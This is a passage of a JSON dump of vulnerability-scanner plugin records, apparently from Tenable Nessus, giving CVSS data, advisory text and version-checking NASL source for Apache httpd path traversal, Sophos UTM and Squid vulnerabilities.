Apache HTTP Server 2.4.50 was insufficient. 
An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives.\n\nIf files outside of these directories are not protected by the usual default configuration 'require all denied', these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution.\n\nThis issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions.\n\nAcknowledgements: Reported by Juan Escobar from Dreamlab Technologies, Fernando Munoz from NULL Life CTF Team, and Shungo Kumasaka", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-11T00:00:00", "type": "nessus", "title": "FreeBSD : Apache httpd -- Path Traversal and Remote Code Execution (d001c189-2793-11ec-8fb1-206a8a720317)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-08-31T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:apache24", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_D001C189279311EC8FB1206A8A720317.NASL", "href": "https://www.tenable.com/plugins/nessus/153983", 
"sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2021 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153983);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/08/31\");\n\n script_cve_id(\"CVE-2021-42013\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"FreeBSD : Apache httpd -- Path Traversal and Remote Code Execution (d001c189-2793-11ec-8fb1-206a8a720317)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeBSD host is missing a security-related update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Apache http server project reports :\n\ncritical: Path Traversal and Remote Code Execution in Apache HTTP\nServer 2.4.49 and 2.4.50 (incomplete fix of CVE-2021-41773)\n(CVE-2021-42013).\n\nIt was found that the fix for CVE-2021-41773 in Apache HTTP Server\n2.4.50 was insufficient. An attacker could use a path traversal attack\nto map URLs to files outside the directories configured by Alias-like\ndirectives.\n\nIf files outside of these directories are not protected by the usual\ndefault configuration 'require all denied', these requests can\nsucceed. 
If CGI scripts are also enabled for these aliased pathes,\nthis could allow for remote code execution.\n\nThis issue only affects Apache 2.4.49 and Apache 2.4.50 and not\nearlier versions.\n\nAcknowledgements: Reported by Juan Escobar from Dreamlab Technologies,\nFernando Munoz from NULL Life CTF Team, and Shungo Kumasaka\");\n # https://vuxml.freebsd.org/freebsd/d001c189-2793-11ec-8fb1-206a8a720317.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4c28c816\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-42013\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache 2.4.50 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache 2.4.49/2.4.50 Traversal RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/10/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/10/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/10/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:freebsd:freebsd:apache24\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"false\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"apache24>=2.4.49<2.4.51\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:56:07", "description": "According to its banner, the version of Apache running on the remote host is 2.4.49 or 2.4.50. It is, therefore, affected by a path traversal vulnerability. The fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. 
An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-08T00:00:00", "type": "nessus", "title": "Apache 2.4.49 < 2.4.51 Path Traversal", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-10-26T00:00:00", "cpe": ["cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_113015", "href": "https://www.tenable.com/plugins/was/113015", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:56:54", "description": "The version of Apache httpd installed on the remote host is 2.4.49 prior to 2.4.51. It is, therefore, affected by a vulnerability as referenced in the 2.4.51 advisory.\n\n - It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. 
An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives.\n (CVE-2021-42013)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-08T00:00:00", "type": "nessus", "title": "Apache 2.4.49 < 2.4.51 Path Traversal Vulnerability", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-08-31T00:00:00", "cpe": ["cpe:/a:apache:http_server", "cpe:/a:apache:httpd"], "id": "APACHE_2_4_51.NASL", "href": "https://www.tenable.com/plugins/nessus/153952", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153952);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/08/31\");\n\n script_cve_id(\"CVE-2021-42013\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n 
script_name(english:\"Apache 2.4.49 < 2.4.51 Path Traversal Vulnerability\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by a vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache httpd installed on the remote host is 2.4.49 prior to 2.4.51. It is, therefore, affected by a\nvulnerability as referenced in the 2.4.51 advisory.\n\n - It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a\n path traversal attack to map URLs to files outside the directories configured by Alias-like directives.\n (CVE-2021-42013)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://httpd.apache.org/security/vulnerabilities_24.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache version 2.4.51 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-42013\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache 2.4.50 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache 2.4.49/2.4.50 Traversal RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n 
script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/10/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/10/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/10/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:http_server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:httpd\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"apache_http_version.nasl\", \"apache_http_server_nix_installed.nbin\", \"apache_httpd_win_installed.nbin\");\n script_require_keys(\"installed_sw/Apache\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\nvar app_info = vcf::apache_http_server::combined_get_app_info(app:'Apache');\n\nvar constraints = [\n { 'min_version' : '2.4.49', 'fixed_version' : '2.4.51' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-12T03:12:04", "description": "A remote code execution vulnerability exists in the WebAdmin of Sophos SG UTM before 9.511 MR11, 9.6 before 9.607 MR7, and 9.7 before 9.705 MR5. 
An unauthenticated, remote attacker can exploit this to bypass authentication and execute arbitrary commands on the remote host as the root user.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-02-09T00:00:00", "type": "nessus", "title": "Sophos SG UTM < 9.511 / 9.6 < 9.607 / 9.7 < 9.705 RCE (CVE-2020-25223)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-25223"], "modified": "2023-02-09T00:00:00", "cpe": ["cpe:2.3:a:sophos:unified_threat_management:*:*:*:*:*:*:*:*", "x-cpe:2.3:o:sophos:unified_threat_management:*:*:*:*:*:*:*:*"], "id": "SOPHOS_SG_UTM_CVE-2020-25223.NASL", "href": "https://www.tenable.com/plugins/nessus/171238", "sourceData": "#%NASL_MIN_LEVEL 80900\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(171238);\n script_version(\"1.1\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/09\");\n\n script_cve_id(\"CVE-2020-25223\");\n 
script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n\n script_name(english:\"Sophos SG UTM < 9.511 / 9.6 < 9.607 / 9.7 < 9.705 RCE (CVE-2020-25223)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Sophos SG UTM is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"A remote code execution vulnerability exists in the WebAdmin of Sophos SG UTM before 9.511 MR11, \n9.6 before 9.607 MR7, and 9.7 before 9.705 MR5. An unauthenticated, remote attacker can exploit this \nto bypass authentication and execute arbitrary commands on the remote host as the root user.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported \nversion number.\");\n # https://www.sophos.com/en-us/security-advisories/sophos-sa-20200918-sg-webadmin-rce\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?76b91a1f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Sophos UTM version 9.511, 9.607, or 9.705 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-25223\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sophos UTM WebAdmin SID Command Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/09/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/17\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/02/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:sophos:unified_threat_management\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:sophos:unified_threat_management\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Firewalls\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"sophos_utm_detect.nbin\", \"sophos_utm_web_detect.nbin\");\n script_require_keys(\"installed_sw/Sophos UTM\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\nvar app_info = vcf::combined_get_app_info(app:\"Sophos UTM\");\n\nvar constraints = [\n {'fixed_version': '9.511', 'fixed_display':'9.511 MR11'}, \n {'min_version': '9.600', 'fixed_version': '9.607', 'fixed_display':'9.607 MR7'},\n {'min_version': '9.700', 'fixed_version': '9.705', 'fixed_display':'9.705 MR5'}\n];\n\nvcf::check_version_and_report(\n app_info:app_info, \n constraints:constraints, \n severity:SECURITY_HOLE\n);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:57:02", "description": "According to the versions of the squid packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - An issue was discovered in Squid before 4.15 and 5.x before 5.0.6. Due to a buffer-management bug, it allows a denial of service. When resolving a request with the urn: scheme, the parser leaks a small amount of memory. However, there is an unspecified attack methodology that can easily trigger a large amount of memory consumption. (CVE-2021-28651)\n\n - An issue was discovered in Squid before 4.15 and 5.x before 5.0.6. 
Due to a memory-management bug, it is vulnerable to a Denial of Service attack (against all clients using the proxy) via HTTP Range request processing. (CVE-2021-31806)\n\n - An issue was discovered in Squid before 4.15 and 5.x before 5.0.6. An integer overflow problem allows a remote server to achieve Denial of Service when delivering responses to HTTP Range requests. The issue trigger is a header that can be expected to exist in HTTP traffic without any malicious intent.\n (CVE-2021-31807)\n\n - An issue was discovered in Squid before 4.15 and 5.x before 5.0.6. Due to an input-validation bug, it is vulnerable to a Denial of Service attack (against all clients using the proxy). A client sends an HTTP Range request to trigger this. (CVE-2021-31808)\n\n - Squid before 4.15 and 5.x before 5.0.6 allows remote servers to cause a denial of service (affecting availability to all clients) via an HTTP response. The issue trigger is a header that can be expected to exist in HTTP traffic without any malicious intent by the server. (CVE-2021-33620)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-25T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP3 : squid (EulerOS-SA-2021-2618)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28651", "CVE-2021-31806", "CVE-2021-31807", "CVE-2021-31808", "CVE-2021-33620"], "modified": "2021-10-25T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:squid", "p-cpe:/a:huawei:euleros:squid-migration-script", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2021-2618.NASL", "href": "https://www.tenable.com/plugins/nessus/154370", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154370);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/10/25\");\n\n script_cve_id(\n \"CVE-2021-28651\",\n \"CVE-2021-31806\",\n \"CVE-2021-31807\",\n \"CVE-2021-31808\",\n \"CVE-2021-33620\"\n );\n\n script_name(english:\"EulerOS 
2.0 SP3 : squid (EulerOS-SA-2021-2618)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the squid packages installed, the EulerOS installation on the remote host is affected by\nthe following vulnerabilities :\n\n - An issue was discovered in Squid before 4.15 and 5.x before 5.0.6. Due to a buffer-management bug, it\n allows a denial of service. When resolving a request with the urn: scheme, the parser leaks a small amount\n of memory. However, there is an unspecified attack methodology that can easily trigger a large amount of\n memory consumption. (CVE-2021-28651)\n\n - An issue was discovered in Squid before 4.15 and 5.x before 5.0.6. Due to a memory-management bug, it is\n vulnerable to a Denial of Service attack (against all clients using the proxy) via HTTP Range request\n processing. (CVE-2021-31806)\n\n - An issue was discovered in Squid before 4.15 and 5.x before 5.0.6. An integer overflow problem allows a\n remote server to achieve Denial of Service when delivering responses to HTTP Range requests. The issue\n trigger is a header that can be expected to exist in HTTP traffic without any malicious intent.\n (CVE-2021-31807)\n\n - An issue was discovered in Squid before 4.15 and 5.x before 5.0.6. Due to an input-validation bug, it is\n vulnerable to a Denial of Service attack (against all clients using the proxy). A client sends an HTTP\n Range request to trigger this. (CVE-2021-31808)\n\n - Squid before 4.15 and 5.x before 5.0.6 allows remote servers to cause a denial of service (affecting\n availability to all clients) via an HTTP response. The issue trigger is a header that can be expected to\n exist in HTTP traffic without any malicious intent by the server. 
(CVE-2021-33620)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security\nadvisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional\nissues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2021-2618\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?eadd0534\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected squid packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-28651\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/05/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/10/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/10/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:squid\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:squid-migration-script\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nvar uvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP3\");\n\nvar sp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(3)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP3\");\n\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP3\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") 